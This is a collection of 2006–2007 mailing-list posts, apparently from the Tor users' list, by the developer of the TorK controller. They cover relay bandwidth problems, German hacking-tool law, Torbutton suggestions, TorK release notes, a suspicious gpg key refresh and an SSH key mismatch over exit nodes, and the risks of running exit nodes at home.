On Wednesday 01 August 2007 09:19:46 Olaf Selke wrote: Hello, my OR still periodically shows up a 24 hours sawtooth bandwidth utilization using 0.1.2.15. Regarding the dropping bandwidth every night GMT+2 it behaves exactly like 0.1.2.14. I supposed this issue to be fixed with 0.1.2.14-dev since the bandwidth utilization with 0.1.2.14-dev doesn't change very much over the day. I've done some light research on this issue and suspect (on the basis of fairly slender analysis) that the problem may not be entirely down to just the version of Tor you're using. The only way to see if it is a factor is to run 0.1.2.14-dev for a while and see if the problem re-appears after a week or two. Would you mind doing that? Is there any special code introduced in 0.1.2.14-dev fixing this issue and has been removed again in 0.1.2.15? For the time being I think I'll stick to 0.1.2.14-dev. Could you state the exact svn revision you're using at the moment? There's no exact release called 0.1.2.14-dev, svn stable branch was given this version name on the 13th July so I'm assuming you're using a particular svn revision from r10822 onwards, sometime between 13th July and 17th July. You can find out the revision by doing an 'svn info' in the tor svn dir. -- Browse Anonymously Anywhere - http://anonymityanywhere.com TorK- KDE Anonymity Manager - http://tork.sf.net KlamAV - KDE Anti-Virus- http://www.klamav.net
Re: Blocking child pornography exits
On Sunday 22 July 2007 05:58:23 Ron Wireman wrote: Unfortunately, this 'separation of concerns' you're a proponent of doesn't work in the real world. In the same way that you can't insert a piece of metal into someone with a high calibre rifle without grievously injuring then, you can't run a completely open anonymous router network without being a conduit for child abuse and other evils. For any action, there may be many possible results, and it seems to me that if one of the evils is overwhelming, it is artificially hedging the issue to say you have no responsibility for it. If tor can't be designed in a way that strongly discourages or prevents people from using it for evil, it shouldn't exist. To pick up on your analogy, what you are asking for here is a gun that cannot shoot innocent people. And if you can't make a gun that only kills people who deserve it then guns shouldn't exist. We all know that weapons (and you can include Tor and the cryptography that underlies Tor in that category) can be used for evil ends [1]. They provide security and can guarantee freedom, but some asshole is always going to use them to do something horrible and make us wonder why we ever invented them in the first place. But a little reflection makes us realize that assholes and murder existed long before the first high calibre rifle, and in fact the high calibre rifle gives us all a better chance of defeating the assholes in the long run, particularly if they're bigger than us and trying to get into our house. Child pornographers and their ilk remind us that privacy, like true freedom of speech, is not an unmitigated blessing but a necessary evil. A bank can secure your bill payment from prying eyes with SSL, so a criminal can do the same with his obsene images. No one is suggesting that SSL develop obscene image filters. The assholes can use SSL/PGP/Tor as much as we do but because these tools protect our privacy we *all* can use them to protect ourselves from even bigger assholes than child pornographers. [1] Most cryptography is classified as a munition in the US and subject to the same export controls. -- Browse Anonymously Anywhere - http://anonymityanywhere.com TorK- KDE Anonymity Manager - http://tork.sf.net KlamAV - KDE Anti-Virus- http://www.klamav.net
Re: magic Wednesday
On Tuesday 17 July 2007 21:17:50 Olaf Selke wrote: Robert Hogan wrote: Just looking at a few days in June for blutmagie, it seems to disappear off the radar shortly after teatime most days, then reappears some time after midnight. Eerily human behaviour, at least by Irish standards. last Saturday I upgraded from version 0.1.2.14 to 0.1.2.14-dev. Now the traffic distribution over the day looks more reasonable. Maybe it was a software issue with 0.1.2.14. Of course a three day statistic doesn't prove anything. Attached you'll find my last 24h traffic stats. Keep you posted... regards, Olaf http://anonymityanywhere.com/blutmagie/blutmagie.txt shows your listing history over june and july on moria1, one of the main dir authorities. Delisting of blutmagie is shown where there is no information beyond the first sixty characters or so. If you look at the date/time column to the right you'll see that interruptions to your listing tend to occur where ~24 hours have been left between updates to your server's descriptor, e.g. caused by your onion key rotating. Your listing has completely recovered since you updated a few days ago - you also changed your server's identity at the same time by the looks of it. If you still have your logs from the affected times, can you see if there are any reports there of failing to upload your new router descriptor to the authorities? I want to do a bit more searching to see if the rut your server got into (updating its descriptor at practically the same time every day) is normal behaviour or not. -- Browse Anonymously Anywhere - http://anonymityanywhere.com TorK- KDE Anonymity Manager - http://tork.sf.net KlamAV - KDE Anti-Virus- http://www.klamav.net
Re: New Torbutton (1.1.4-alpha)
On Monday 09 July 2007 10:16:55 Mike Perry wrote: Feedback, suggestions, and comments are welcome. Especially if someone could point out what I'm doing wrong with the OpenSearch Google search plugin installations (which are somewhat unrelated, but I figured were worth putting up there, since a major usability complaint is Why do I get the damn German/Chinese/etc Google with Tor?). Stop me if this has been suggested before, but would it be worth introducing an unofficial URI for hidden services that would make them recognisable to the likes of torbutton? The idea being that the user could 'enable tor' simply by clicking on a hidden service link rather than the usual jig of click-servernotfound-back-scratchhead-enabletor-clickagain. Is this possible with a firefox plugin or would it be necessary to get the firefox developers on board? It is already possible with konqueror/kde thanks to kioslaves (tork implements a tor: 'URI' that does just this). -- Browse Anonymously Anywhere - http://anonymityanywhere.com TorK- KDE Anonymity Manager - http://tork.sf.net KlamAV - KDE Anti-Virus- http://www.klamav.net
Re: New Torbutton (1.1.4-alpha)
On Wednesday 11 July 2007 10:10:36 Mike Perry wrote: . Changing tor state automatically makes me a little nervous, even if it is only in the Tor Enabled direction.. If torbutton could request a yes/no response from the user in such situations that would be nice. -- Browse Anonymously Anywhere - http://anonymityanywhere.com TorK- KDE Anonymity Manager - http://tork.sf.net KlamAV - KDE Anti-Virus- http://www.klamav.net
Re: End of ROCKate soon
On Tuesday 10 July 2007 05:48:39 Benjamin Schieder wrote: On 09.07.2007 10:42:34, Bill Weiss wrote: Benjamin Schieder([EMAIL PROTECTED])@Fri, Jul 06, 2007 at 07:10:54PM +0200: On 06.07.2007 12:01:06, Arrakis wrote: Benjamin, Sorry to hear you won't be keeping up on the ROCKate and have been forced to succumb to Germany's turn. I expect more such tor-related shutdowns among fear and legislation. I'll be picking up the slack shortly, so no worries. A development release of xB Machine will be available August 3rd. It will likely be hosted from Germany, but I think we will stand the heat. If Germany doesn't like it we will host it elsewhere. If you want, we could probably host it for you, but I don't know how much you want it still available, if Germany will punish you for it. I'd be really happy if someone can host it outside Germany. I don't think they can sue me because I did the work before the law passed. What are the bandwidth/month requirements? I might be able to do it off of my Tor server without too much pain. A rough estimate is that the ISO images have caused around 30-40 GB of BitTorrent traffic. I have no data about the subversion repository. The website should be in the sizes of dozens of MB. Greetings, Benjamin I've added a placeholder entry for rockate to anonymityanywhere.com. If you'd like to provide some screenshots I can add them too. -- Browse Anonymously Anywhere - http://anonymityanywhere.com TorK- KDE Anonymity Manager - http://tork.sf.net KlamAV - KDE Anti-Virus- http://www.klamav.net
Re: End of ROCKate soon
On Friday 06 July 2007 17:50:08 Benjamin Schieder wrote: Hi people. In response to a law that passed the german legislative today, I will cease production, development and distribution of ROCKate binaries and - maybe - even source code soon. The reasen is §202c StGB which states (IANAL translation): Producing, acquiring, selling, giving, distributing or making-accessible of passwords or other access codes as well as computer programs whose aim it is to commi a crime ... will be punished with up to one year in jail or a fine. IANAL interpretation: Unless the aim of ROCKate is to commit a crime, as opposed to facilitating privacy, then you have nothing to worry about. Honest. Given Germany's recent history with Tor I understand your caution. And I don't think anyone would want to be the subject of a test case. If the law is intended to mean a computer program that facilitates a crime then it's hard to think where the law could stop. I honestly think they are going after the bots and viruses with this, perhaps even programs that clone smart card information. If the remit is broader I'm really not sure how you could hang this law on Tor without hanging it on PGP as well. And then SSL and so on. Are you aware of any other German software projects with similar concerns? -- Browse Anonymously Anywhere - http://anonymityanywhere.com TorK- KDE Anonymity Manager - http://tork.sf.net KlamAV - KDE Anti-Virus- http://www.klamav.net
Re: The Hidden Wiki is Gone ... so how can I find TOR-only web pages?
On Friday 08 June 2007 15:23:42 Rip Rock wrote: I had wanted to find out about who is posting web pages that require TOR to be viewed. http://6sxoyfb3h2nvok2d.onion/ just has a sad little message that says, The *hidden **Wiki* is *gone*. There are some resources at: http://www.aolsearchin.com/ but some of them appear to be completely out of date. Maybe some are current but not showing up right now. I guess this means I might have to join the mailing list at: http://archives.seul.org/or/talk/ in order to get fun TOR urls to view. If anyone has any resources on fun TOR-specific URLs to surf, I'm listening. Thanks. apropos of nothing, it's interesting how the notice on http://6sxoyfb3h2nvok2d.onion/ narrows down its location. 'The hidden wiki is gone. If you set up a new one and post the link to the or-talk list I'll link it from here. 06/07/07.' Not trying to be facetious, just a possible 'tell' worth bearing in mind if you're running a hidden server I guess. -- Browse Anonymously Anywhere - http://anonymityanywhere.com TorK- KDE Anonymity Manager - http://tork.sf.net KlamAV - KDE Anti-Virus- http://www.klamav.net
Re: suggestion for 'is my installation of tor working?' page
I've put together the sort of page I think new Tor users need to visit when they get started on Tor for the first time. It's designed for TorK users, so doesn' t attempt to check your IP address or anything like that. Since it's very hard for a web service to know *all* Tor nodes at any given time, I wonder if the Tor node check is more confusing than it is helpful. http://healthcheck.anonymityanywhere.com I've basically just filleted the jscript at showmyip.com/torstatus and made it a little more user-friendly. The catch with this sort of page is that a healthcheck website can only check for plugins/java/cookies if jscript is enabled, so you never get a fully green response. But at least it alerts users to the ways in which they can leak anonymity. As an aside, shouldn't the download page mention the perils of javascript? -- Browse Anonymously Anywhere - http://anonymityanywhere.com TorK- KDE Anonymity Manager - http://tork.sf.net KlamAV - KDE Anti-Virus- http://www.klamav.net
Re: www.torrify.com
On Tuesday 08 May 2007 22:52:29 Sam wrote: ??? isn't TOR a volunteer effort? Are they using TOR and making $$'s off it? They're perfectly entitled to. More power to their elbow. From what I understand of torrify though you are more or less back to trusting an 'anonymity provider', rather than trusting to the safety in numbers that characterizes the Tor network proper. And that seems a bit self-defeating. Arrakis is they guy behind torrify and frequents this list. Arrakis, I take it the above is an unfair summary? -- Browse Anonymously Anywhere - http://anonymityanywhere.com TorK- KDE Anonymity Manager - http://tork.sf.net KlamAV - KDE Anti-Virus- http://www.klamav.net
Tor LiveCD
This weekend I had a go at putting together a rudimentary Tor LiveCD. It's in usable condition (it boots, tork starts up and you can browse 'anonymously') but definitely not worth the bandwidth yet. I've documented the procedure as it currently stands at http://tork.sourceforge.net/wiki/index.php/LiveCD I don't have any particular opinion of which firewall/privoxy/permissions config is best, so invite anyone here to contribute to the wiki page to add/edit as they see fit. (That said, I would appreciate if you add rather than delete if performing substantial edits.) If nothing else the wiki page might be a useful starting point for a 'canonical' Tor Live CD. -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
gpg refresh keys
A couple of things: 1. A funny thing happened on the way to the forum.. without tor: [EMAIL PROTECTED]:~$ gpg --refresh-keys gpg: NOTE: old default options file `/home/robert/.gnupg/options' ignored gpg: refreshing 4 keys from hkp://wwwkeys.eu.pgp.net gpg: requesting key EA59038E from hkp server wwwkeys.eu.pgp.net gpg: requesting key 985A444B from hkp server wwwkeys.eu.pgp.net gpg: requesting key 22F6856F from hkp server wwwkeys.eu.pgp.net gpg: requesting key 28988BF5 from hkp server wwwkeys.eu.pgp.net gpg: key EA59038E: Stephen Gran [EMAIL PROTECTED] not changed gpg: key 985A444B: Tomasz Kojm [EMAIL PROTECTED] not changed gpg: key 22F6856F: Robert Hogan [EMAIL PROTECTED] not changed gpg: key 28988BF5: Roger Dingledine [EMAIL PROTECTED] not changed gpg: Total number processed: 4 gpg: unchanged: 4 a few seconds later using tor/privoxy on exit mychat4004d801 (resolves to an edu.tw address): bash-3.1$ gpg --refresh-keys gpg: NOTE: old default options file `/home/robert/.gnupg/options' ignored gpg: refreshing 4 keys from hkp://wwwkeys.eu.pgp.net gpg: requesting key EA59038E from hkp server wwwkeys.eu.pgp.net gpg: requesting key 985A444B from hkp server wwwkeys.eu.pgp.net gpg: requesting key 22F6856F from hkp server wwwkeys.eu.pgp.net gpg: requesting key 28988BF5 from hkp server wwwkeys.eu.pgp.net gpg: key 28988BF5: Roger Dingledine [EMAIL PROTECTED] 2 new signatures gpg: Total number processed: 4 gpg: unchanged: 3 gpg: new signatures: 2 gpg: 3 marginal(s) needed, 1 complete(s) needed, classic trust model gpg: depth: 0 valid: 1 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 1u I've removed reference to other keys that were verified and unchanged. Only Roger's was affected. I have a cloudy understanding of the gpg infrastructure but this seems suspicious. Anyone? 2. torify gpg --refresh-keys I'm using the patched libsocks that handles dns itself and cannot get the above to work. Always times out. Has anyone else got it to work? -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Anyhoo...
On the face of it, forcing tor to be 'geo-diverse' (dread word) is fairly straightforward. The option is called NodeFamily. Ask the author of your favourite tor controller to implement something like 'Enforce Geoographical Diversity' and instruct tor to treat all servers in the same country as a nodefamily. Of course, you could also do it yourself using: https://torstat.xenobite.eu/index.php?SortBy=G The chances are Tor itself will never do this for you - it has kludge written all over it. Also while it might mitigate looping through the same ISP at entry and exit, it will probably make you statistically *more* likely to hit a global adversary, such as, erm, world gentil(l?)ery. Thoughts anyone? Worth doing? -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: question about router depth
On Sunday 28 January 2007 18:28, Rob wrote: I was listening to the security now podcast on twit about tor and I think they got it all wrong. They made it sound like you could go through as many routers as you configure it to do. I will send them an email. Thanks for the replies. Rob On Sun, 28 Jan 2007 08:28:28 -0500, Dan Collins [EMAIL PROTECTED] wrote: 3. You are always going through 3 other routers, and there is no way to change that. Unless I've misunderstood the question, you *can* create circuits with more than 3 routers. You can also use them. I just created a 4 router circuit with tork and fetched the rss feed from www.kde.org with it. So your information is correct. That said, there is no benefit to using more than 3 routers. And a stream with anything less than 3 is not very anonymous. -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: TorK 0.13 Released - Many new features
Due to a cock-up on my part, this version of TorK is only compatible with the alpha series of Tor for the time being. Once 'getinfo ns/all' makes it into the stable series, it'll be usable on both again. Apologies if I've inconvenienced any 'stable' users. BTW, will ns/all go into stable anytime soon? Or should I really consider winding back? On Saturday 27 January 2007 22:40, Robert Hogan wrote: Hi All, I've just released a new version of TorK, with quite a few new features. The addition of a mixminion client, as well as the facility to manage anonymous use of Opera and Firefox, broadens TorK's horizons a bit. I'm still looking for new ideas/features for TorK so if you can think of something useful it should have, let me know. Screenshots are available at: http://www.kde-apps.org/content/preview.php?preview=1id=39442file1=39442- 1.pngfile2=39442-2.pngfile3=39442-3.pngname=TorK The highlights for the new release are (you may recognize the changelog style ;-) ): Major Features o New, improved set-up wizard (incomplete but fully functional). o Send Anonymous Email using mixminion. o Browse Anonymously with Firefox o Browse Anonymously with Opera o Graphs now show system network traffic on eth* interfaces. o Link to privoxy configuration. o Modify appearance of konqueror windows when anonymous browsing enabled (experimental). Minor Features o Optional 'Paranoid' mode for browsing. o Improvements to tor network display. o Make exit nodes in the server list identifiable. o Improvements to quick launch interface. o Reverse lookup IP address of servers when displaying their status. o Better 'guard' icons. o Better privoxy management. You can try it straight from CVS: [handy copy/paste for installing it] cd ~ mkdir torkcvs cd torkcvs cvs -z3 -d:pserver:[EMAIL PROTECTED]:/cvsroot/tork co -P tork cd tork make -f Makefile.cvs ./configure make su -c 'make install' or download it at: http://sourceforge.net/project/showfiles.php?group_id=159836 Regards, Robert -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: TorK 0.13 Released - Many new features
On Saturday 27 January 2007 23:22, Patrick Hooker wrote: C compiler cannot make executables there are some suggestions in: http://forums.gentoo.org/viewtopic.php?t=27719 -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: [EMAIL PROTECTED]: Re: [pfSense Support] tor and traffic shaper]
On Monday 15 January 2007 11:18, Eugen Leitl wrote: - Forwarded message from mOjO [EMAIL PROTECTED] - From: mOjO [EMAIL PROTECTED] Date: Mon, 15 Jan 2007 03:43:21 -0600 To: support@pfsense.com Subject: Re: [pfSense Support] tor and traffic shaper Reply-To: support@pfsense.com User-Agent: Thunderbird 1.5.0.9 (X11/20070103) yes i am... and quite well. first i just ran through the wizard. then i edited the entries for torrents to match my ports (i use non-standard torrent ports) and then i hasn't he seen 'tor' and read 'torrents'? -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: more letters from the feds
On Monday 08 January 2007 11:42, Alexander Janssen wrote: And it also should be pointed out omce again that it would be a rather stupid idea to run a TOR exit-node at home, for a dynamic IP-address is blinking wildly on their radar. The possible consequences are left up to your imagination. I think this is a valid point. I ran an exit-node for a short while at home without thinking too much about it. The huge amount of traffic I was attracting (even within minutes of booting up) made me shut it off for the sake of personal convenience, but I don't think I will ever go back - explaining to the authorities why child porn/terrorist manuals/online fraud appear to have originated from my home IP is not an edifying prospect, to say the least. These days I generally run a middle-man node but even that has started to feel inappropriate for home use. I would be amazed if regular appearances on directory servers does not blink wildly on some form of institutional radar, low-hanging fruit and all that. So my questions are: * From a common-sense, peace-of-mind point of view, is running an exit-node strictly for co-located servers? Does anyone here run one at home? If so, have you had second thoughts? * Are tor-at-home users who run middleman servers out of the goodness of their heart possibly exposing themselves to unwanted attention? Do we have any evidence of such attention, anecdotal or otherwise? * Is there some good way of helping a user to weigh this all up? Sorry for labouring the point a bit but I agree with the OP: I wouldn't recommend anyone to run an exit-server from home. Is this received wisdom among experienced users, or are we just being alarmist? If not, does this need to be spelt out to new users a little better, or do we just assume that they are competent enough to grasp all the possible consequences of their actions? -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: Wired article on Tor
On Saturday 30 December 2006 07:45, Anil Gulecha wrote: I wanted to know what the developers think : http://www.wired.com/news/technology/0,72375-0.html?tw=rss.technology Regards The Tor authors were involved in the paper. Look through the or-talk archives from a few months ago - you should find mention of it. -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
man in the middle?
Got this when testing an ssh connection: WARNING: DSA key found for host shell.sf.net in /home/robert/.ssh/known_hosts:8 DSA key fingerprint 4c:68:03:d4:5c:58:a6:1d:9d:17:13:24:14:48:ba:99. The authenticity of host 'shell.sf.net (66.35.250.208)' can't be established but keys of different type are already known for this host. RSA key fingerprint is cf:9b:db:c4:53:c3:f0:0d:e8:c4:15:33:61:71:01:ca. Are you sure you want to continue connecting (yes/no)? no Tor first attempted to attach a circuit with toxischnet as it's exit. This didn't work, so it then used tormentor. I then got the above. I subsequently used both toxischnet and tormentor to connect without any key authentication issues. The RSA fingerpint is not listed by sourceforge. http://sourceforge.net/docs/G04/en/#fingerprintlist Malice? Misconfiguration of some sort? Anyone care to test either of these exits? -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: suggestion for 'is my installation of tor working?' page
On Thursday 21 December 2006 05:19, you wrote: Good idea. We will work on getting a page available on showmyip.com to do this - maybe something like http://www.showmyip.com/torstatus/ with just the relevant data for new Tor users. . . . Wesley Kenzie WebMaster http://www.showmyip.com/ http://www.privacy-ecosystem.com/ Sounds great, looking forward to it! I'll direct TorK users to it once it's up and running. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Robert Hogan Sent: December 19, 2006 1:07 PM To: or-talk@freehaven.net Subject: suggestion for 'is my installation of tor working?' page Hi all, http://lefkada.eecs.harvard.edu/cgi-bin/ipaddr.pl?tor=1 https://tns.nighteffect.com/ https://torstat.xenobite.eu/ All of the above provide useful information for the first-time tor user. But the last two are only really meaningful to initates (and probably confusing to everyone else), while the first is reassuring but could really offer a little more. What is needed (IMVHO) is a page that confirms you are using tor successfully, but also introduces you to the other services that tor offers and also some advice for the tor debutante. A sort of official or unofficial 'welcome to the tor network' page. This could be linked to in the FAQ/INSTALL and used by controllers/front-ends. Would the maintainers of any of the above be interested in providing such a thing? Given that the heavy lifting has already been done on all of the above, it would be very trivial to create. Would there be an appetite for such a thing on the tor homepage itself? Suggestions for content: * A warm greeting! * Top Five things all tor users should know * Appeal for users to run servers and link to how-to * An introduction to some hidden services Anyway, just a thought... Robert -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: suggestion for 'is my installation of tor working?' page
On Tuesday 19 December 2006 21:22, Michael Holstein wrote: what about http://www.showmyip.com It will tell you if you're using a TOR node (and which one, as well as its exit policy) ~Mike. It's almost as overwhelming as tns and torstat. I guess I'm thinking more along the lines of a landing page for tor users. Something that will ease the first-time user into anonymous browsing and perhaps give them some do's and don'ts before they get started, along with a basic health check on their browser settings. Some more suggestions (taken from good stuff buried halfway down showmyip): * Browser detected * Detection of flash/javascript/cookies with health warnings if enabled. My point is that it would be such an easy thing to do given that all of these sites have the infrastructure already in place. Just a question of presentation. Robert Hogan wrote: Hi all, http://lefkada.eecs.harvard.edu/cgi-bin/ipaddr.pl?tor=1 https://tns.nighteffect.com/ https://torstat.xenobite.eu/ All of the above provide useful information for the first-time tor user. But the last two are only really meaningful to initates (and probably confusing to everyone else), while the first is reassuring but could really offer a little more. What is needed (IMVHO) is a page that confirms you are using tor successfully, but also introduces you to the other services that tor offers and also some advice for the tor debutante. A sort of official or unofficial 'welcome to the tor network' page. This could be linked to in the FAQ/INSTALL and used by controllers/front-ends. Would the maintainers of any of the above be interested in providing such a thing? Given that the heavy lifting has already been done on all of the above, it would be very trivial to create. Would there be an appetite for such a thing on the tor homepage itself? Suggestions for content: * A warm greeting! * Top Five things all tor users should know * Appeal for users to run servers and link to how-to * An introduction to some hidden services Anyway, just a thought... Robert -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: How can I trust all my Tor nodes in path
On Friday 01 December 2006 20:55, Tim Warren wrote: On 12/1/06, Robert Hogan [EMAIL PROTECTED] wrote: The real danger with Tor is using sensitive information over http rather than https and mixing anonymous and non-anonymous traffic over the same circuit. Those two are the most common and most easy mistakes to make. Maybe you could answer a question for me. Should I NOT login in to a site, such as a bank, when using Tor? Or do I need to make sure it is https:? Appreciate any clarification. Thanks, If you use https (and your browser hasn't complained about the ssl certificate) you're fine. The exit node can see everything (if they want) over http. Everything after the exit node is just as good or bad as if you weren't using tor. Tor just adds an extra guy to the chain of *reputable* carriers who *could* monitor your traffic - and it is best practice to assume that at least the tor exit node is doing exactly that. see http://tor.unixgu.ru -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: How can I trust all my Tor nodes in path
On Friday 01 December 2006 21:23, Seth David Schoen wrote: Some people have suggested that this is a good application for trusted computing; proxies could prove that they're running the real, official proxy software on top of real hardware. Then timing attacks are still possible, but actually logging data directly could be prevented. The problem with this seems to be that intentionally doing timing attacks directly against a proxy you operate, from within the same network, is probably pretty effective! You've lost me here - could you explain further? How would it prevent logging data? This approach might be more relevant to lower-latency anonymity services such as e-mail remailers. -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Opening controlport by default
Hi all, Did tor ever open the control port by default? It's not doing so now. I can certainly understand why it might not be a good idea to open the control port without an explicit request to do so. However, the flip side is that a default installation of tor (especially a packaged one where the user hasn't had to familiarize themselves with the conf files and tor starts automatically at boot-time) can't be used by a controller out-of-the-box on *nix. This was certainly my experience of the (rather old) tor package for kubuntu. The solution mght be to include a configuration script with tor. Something the controller could call upon to help the user through a bit of default coniguration to make tor controller-friendly. This script could also run through the boot-time setup of tor. I guess it could even help configure privoxy/polipo in a way that is useful to tor. Has anyone given any thought to this? Controller issues aside it would be a very useful bridge between installing tor on *nix and getting it up and running. On the same note, is anyone familiar with a multi-distro setup script that this could be based on? -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
TorK 0.11 Released
Hi All, A new version of TorK has been released and I'm looking for as much destructive/constructive criticism as possible! TorK is a Tor Controller for KDE. TorK allows you to configure, run and update Tor. It also allows you to view the Tor network and choose how you would like to interact with the network. Download at http://sourceforge.net/project/showfiles.php?group_id=159836 Home page at http://tork.sf.net TorK contains a number of unique/useful features: * (NEW) A quickstart page for launching torified applications. See https://sourceforge.net/project/screenshots.php?group_id=159836 * A hidden services wizard that allows you to create and publish hidden services. * A drag-and-drop view of the Tor network. Create, modify and close circuits. Attach and detach streams manually from circuits. Click on servers to view their full details. * Exit node blocking/preferring by country and server name. See https://sourceforge.net/project/screenshots.php?group_id=159836ssid=45119 * Tor and Non-Tor traffic logs - showing you the traffic that is going through Tor and the traffic that is not. The Tor traffic log maintains a record of the circuit you used for each connection. Both logs are maintained in memory only and can be flushed by the user at any time. * A turn-on-and-off-able mini-view that shows you the traffic currently going through Tor - including destination, status, and exit node's name and country. * Passive pop-ups alerting you to important Tor events, such as changes to your server status, DNS leaks, errors reported by Tor. * Quick configuration - six default configurations available for getting Tor running the simple and easy way. * Full access to all Tor configuration options. I've changed the official status of TorK from alpha to beta because I really think it's getting there. If you try TorK please let me know about it's shortcomings either by contacting [EMAIL PROTECTED] or the feedback feature built into TorK. Thanks for your time! Robert -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: ciruit history
On Monday 06 November 2006 22:16, Kees Vonk wrote: Does Tor keep a note of the different circuits it chooses? I am interested in seeing what entry and exit nodes are being used over a period of time. TorK does this for you - but does not write the history to a file. -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: Practical onion hacking: finding the real address of Tor clients
On Friday 20 October 2006 14:53, Fabian Keil wrote: For a user new to Tor, the documentation is often confusing or ambiguous, important information is missing, and sometimes minor details over emphasized (especially in Tor FAQ). Tor is a young product and hopefully these problems will be remedied as it grows. In the meantime though, some users are depending on it for anonymity. You can be sure that someone in Red China, searching for information his or her government does not want them to see, is not likely to have mis configured or misused Tor for want of trying to get it right. I assume you mean the opposite of the last sentence? I can't speak for the OP but I think he meant what he said. If someone is using Tor, they are *trying* to be anonymous. Whether they are successful or not depends on how well they've digested the FAQ - and I think it is a fair point that some things (such as javascript/flash and the perils of unencypted traffic) require more emphasis than others (e.g. why is tor so slow, how often does tor change its paths). Anyway, there will always be some people who don't understand the documentation, or don't even bother to read it. That's the case for every product and not a Tor specific problem. I think there are subtleties to the safe use of Tor that require some technical understanding. And that is a Tor specific problem which shouldn't be overlooked. -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: Analyzing TOR-exitnodes for anomalies
Hmmm... I had this problem with Whistlemother exit node and this site: http://www.iamaphex.net with the same frame.aspx?u=http%3a%2f%2flanding.domainsponsor.com blah blah blah filter ... =SUSPECTED+UNDESIRABLE+BOT i have the same experience using whistlersmother for the same site. -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: Analyzing TOR-exitnodes for anomalies
On Friday 06 October 2006 19:21, Robert Hogan wrote: Hmmm... I had this problem with Whistlemother exit node and this site: http://www.iamaphex.net with the same frame.aspx?u=http%3a%2f%2flanding.domainsponsor.com blah blah blah filter ... =SUSPECTED+UNDESIRABLE+BOT i have the same experience using whistlersmother for the same site. And I have the same experience with practically every other exit node I try for this site. So whistlersmother is not the problem... -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: GERMAN JUSTICE MINISTER CALLS FOR LIMITS TO NET ANONYMIZER
On Wednesday 23 August 2006 17:08, Bill Watson wrote: The means of defense against foreign danger historically have become the instruments of tyranny at home. James Madison, fourth president of the United States On Wed, 23 Aug 2006 08:56:00 -0700, Joseph Lorenzo Hall [EMAIL PROTECTED] said: GERMAN JUSTICE MINISTER CALLS FOR LIMITS TO NET ANONYMIZER The Minister of Justice of the German federal state of Schleswig-Holstein Uwe Döring has called for limits to be set - in the interest of combating terrorism - on anonymization on the Internet. The Minister said that the Independent State Center for Data Protection of Schleswig-Holstein (ULD), based in the state's capital of Kiel in northern Germany, should take the anonymization program it offers as a free download off the Internet immediately. http://www.heise.de/english/newsticker/news/77162 -- If there was reasonable suspicion of a crime and if the German Code of Criminal Procedure provided for such an approach in the case in question, it was quite possible to register the IP addresses of computers, Mr. Weichert observed. Umm. So it's only anonymous until they need to find out who you are? Or have I misunderstood the point? - KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: following on from today's discussion
On Monday 21 August 2006 18:20, Jay Goodman Tamboli wrote: (moving back to or-talk) On 2006.08.21, at 13:06, Robert Hogan wrote: On Sunday 20 August 2006 23:19, Chris Palmer wrote: Jay Goodman Tamboli writes: Is it true that your traffic is more likely to be eavesdropped upon? We can only speculate. End-to-end encryption... It's not a matter of speculation. Using Tor expands the number of potential eavesdroppers by at least the number of exit nodes in the Tor network. While it's true the number of potential eavesdroppers across all connections increases that much, the number of potential eavesdroppers for any one connection or at any single time would seem to increase only a little. That is, without Tor you have your ISP and whatever computers are between it and your destination, and with Tor you have the exit node operator, his ISP, and whatever computers are between it and your destination. Whether the exit node operator is likely to eavesdrop is, I think, speculation. /jgt That's correct - the activities of individual exit node operators is purely in the realms of speculation. But what is not speculation is that some of them are eavesdropping. 'Among other things, Tor is a handy tool for harvesting random username/password pairs.' I believe that's a true statement. And that's why I think Tor traffic is more likely to be eavesdropped upon: because it is as much a hacking tool for scriptkiddies as it is an anonymity network client for everyone else. That's my only point really. Tor has a specific layer of exposure that is easily accessible to anyone who is interested in it. That is not true of non-Tor traffic. -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: following on from today's discussion
